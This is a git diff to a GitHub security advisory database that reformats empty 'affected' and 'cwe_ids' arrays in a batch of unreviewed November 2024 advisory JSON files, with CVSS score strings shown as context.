a/advisories/unreviewed/2024/11/GHSA-ww8x-g5fj-6wpj/GHSA-ww8x-g5fj-6wpj.json b/advisories/unreviewed/2024/11/GHSA-ww8x-g5fj-6wpj/GHSA-ww8x-g5fj-6wpj.json index 930f695842d..a320c60d1a6 100644 --- a/advisories/unreviewed/2024/11/GHSA-ww8x-g5fj-6wpj/GHSA-ww8x-g5fj-6wpj.json +++ b/advisories/unreviewed/2024/11/GHSA-ww8x-g5fj-6wpj/GHSA-ww8x-g5fj-6wpj.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-x3rw-xr73-fq7h/GHSA-x3rw-xr73-fq7h.json b/advisories/unreviewed/2024/11/GHSA-x3rw-xr73-fq7h/GHSA-x3rw-xr73-fq7h.json index 15abc82c241..9804d96083d 100644 --- a/advisories/unreviewed/2024/11/GHSA-x3rw-xr73-fq7h/GHSA-x3rw-xr73-fq7h.json +++ b/advisories/unreviewed/2024/11/GHSA-x3rw-xr73-fq7h/GHSA-x3rw-xr73-fq7h.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-x3wm-c2q4-c9px/GHSA-x3wm-c2q4-c9px.json b/advisories/unreviewed/2024/11/GHSA-x3wm-c2q4-c9px/GHSA-x3wm-c2q4-c9px.json index a31a9c8d08b..7c4bf6db49c 100644 --- a/advisories/unreviewed/2024/11/GHSA-x3wm-c2q4-c9px/GHSA-x3wm-c2q4-c9px.json +++ b/advisories/unreviewed/2024/11/GHSA-x3wm-c2q4-c9px/GHSA-x3wm-c2q4-c9px.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-x4h3-pqgr-cw5f/GHSA-x4h3-pqgr-cw5f.json b/advisories/unreviewed/2024/11/GHSA-x4h3-pqgr-cw5f/GHSA-x4h3-pqgr-cw5f.json index 6d0973b97b8..8d93a40c58a 100644 --- a/advisories/unreviewed/2024/11/GHSA-x4h3-pqgr-cw5f/GHSA-x4h3-pqgr-cw5f.json +++ b/advisories/unreviewed/2024/11/GHSA-x4h3-pqgr-cw5f/GHSA-x4h3-pqgr-cw5f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-x5gx-hgg2-539h/GHSA-x5gx-hgg2-539h.json b/advisories/unreviewed/2024/11/GHSA-x5gx-hgg2-539h/GHSA-x5gx-hgg2-539h.json index e42b7867521..31fd9754493 100644 --- a/advisories/unreviewed/2024/11/GHSA-x5gx-hgg2-539h/GHSA-x5gx-hgg2-539h.json +++ b/advisories/unreviewed/2024/11/GHSA-x5gx-hgg2-539h/GHSA-x5gx-hgg2-539h.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-x769-q69g-2jw4/GHSA-x769-q69g-2jw4.json b/advisories/unreviewed/2024/11/GHSA-x769-q69g-2jw4/GHSA-x769-q69g-2jw4.json index 31368b80b39..8f5e5702a0b 100644 --- a/advisories/unreviewed/2024/11/GHSA-x769-q69g-2jw4/GHSA-x769-q69g-2jw4.json +++ b/advisories/unreviewed/2024/11/GHSA-x769-q69g-2jw4/GHSA-x769-q69g-2jw4.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-xf5m-j333-gw96/GHSA-xf5m-j333-gw96.json b/advisories/unreviewed/2024/11/GHSA-xf5m-j333-gw96/GHSA-xf5m-j333-gw96.json index 3cbbfe3adee..da8ffbf41ea 100644 --- a/advisories/unreviewed/2024/11/GHSA-xf5m-j333-gw96/GHSA-xf5m-j333-gw96.json +++ b/advisories/unreviewed/2024/11/GHSA-xf5m-j333-gw96/GHSA-xf5m-j333-gw96.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-xgmg-hrgx-6gqq/GHSA-xgmg-hrgx-6gqq.json b/advisories/unreviewed/2024/11/GHSA-xgmg-hrgx-6gqq/GHSA-xgmg-hrgx-6gqq.json index 736f96c9548..7f25db1b0af 100644 --- a/advisories/unreviewed/2024/11/GHSA-xgmg-hrgx-6gqq/GHSA-xgmg-hrgx-6gqq.json +++ b/advisories/unreviewed/2024/11/GHSA-xgmg-hrgx-6gqq/GHSA-xgmg-hrgx-6gqq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-xgvm-jcp3-352m/GHSA-xgvm-jcp3-352m.json b/advisories/unreviewed/2024/11/GHSA-xgvm-jcp3-352m/GHSA-xgvm-jcp3-352m.json index c65f68f795a..c4cd5342c90 100644 --- a/advisories/unreviewed/2024/11/GHSA-xgvm-jcp3-352m/GHSA-xgvm-jcp3-352m.json +++ b/advisories/unreviewed/2024/11/GHSA-xgvm-jcp3-352m/GHSA-xgvm-jcp3-352m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-xh2w-4r3v-jgq5/GHSA-xh2w-4r3v-jgq5.json b/advisories/unreviewed/2024/11/GHSA-xh2w-4r3v-jgq5/GHSA-xh2w-4r3v-jgq5.json index 9aaf13bf367..cf92c0780a9 100644 --- a/advisories/unreviewed/2024/11/GHSA-xh2w-4r3v-jgq5/GHSA-xh2w-4r3v-jgq5.json +++ b/advisories/unreviewed/2024/11/GHSA-xh2w-4r3v-jgq5/GHSA-xh2w-4r3v-jgq5.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-xhgh-m73w-g9xm/GHSA-xhgh-m73w-g9xm.json b/advisories/unreviewed/2024/11/GHSA-xhgh-m73w-g9xm/GHSA-xhgh-m73w-g9xm.json index 3dca7600671..ff4b4d893d7 100644 --- a/advisories/unreviewed/2024/11/GHSA-xhgh-m73w-g9xm/GHSA-xhgh-m73w-g9xm.json +++ b/advisories/unreviewed/2024/11/GHSA-xhgh-m73w-g9xm/GHSA-xhgh-m73w-g9xm.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-xp95-8cxx-xfmw/GHSA-xp95-8cxx-xfmw.json b/advisories/unreviewed/2024/11/GHSA-xp95-8cxx-xfmw/GHSA-xp95-8cxx-xfmw.json index 8218f465ceb..a73eb4b5e35 100644 --- a/advisories/unreviewed/2024/11/GHSA-xp95-8cxx-xfmw/GHSA-xp95-8cxx-xfmw.json +++ b/advisories/unreviewed/2024/11/GHSA-xp95-8cxx-xfmw/GHSA-xp95-8cxx-xfmw.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-xpp8-xxjx-cr2h/GHSA-xpp8-xxjx-cr2h.json b/advisories/unreviewed/2024/11/GHSA-xpp8-xxjx-cr2h/GHSA-xpp8-xxjx-cr2h.json index 83c425f68ae..99e338da358 100644 --- a/advisories/unreviewed/2024/11/GHSA-xpp8-xxjx-cr2h/GHSA-xpp8-xxjx-cr2h.json +++ b/advisories/unreviewed/2024/11/GHSA-xpp8-xxjx-cr2h/GHSA-xpp8-xxjx-cr2h.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-xr2f-69jg-7g6f/GHSA-xr2f-69jg-7g6f.json b/advisories/unreviewed/2024/11/GHSA-xr2f-69jg-7g6f/GHSA-xr2f-69jg-7g6f.json index 9b8d29fbaee..ac32ef7acba 100644 --- a/advisories/unreviewed/2024/11/GHSA-xr2f-69jg-7g6f/GHSA-xr2f-69jg-7g6f.json +++ b/advisories/unreviewed/2024/11/GHSA-xr2f-69jg-7g6f/GHSA-xr2f-69jg-7g6f.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY",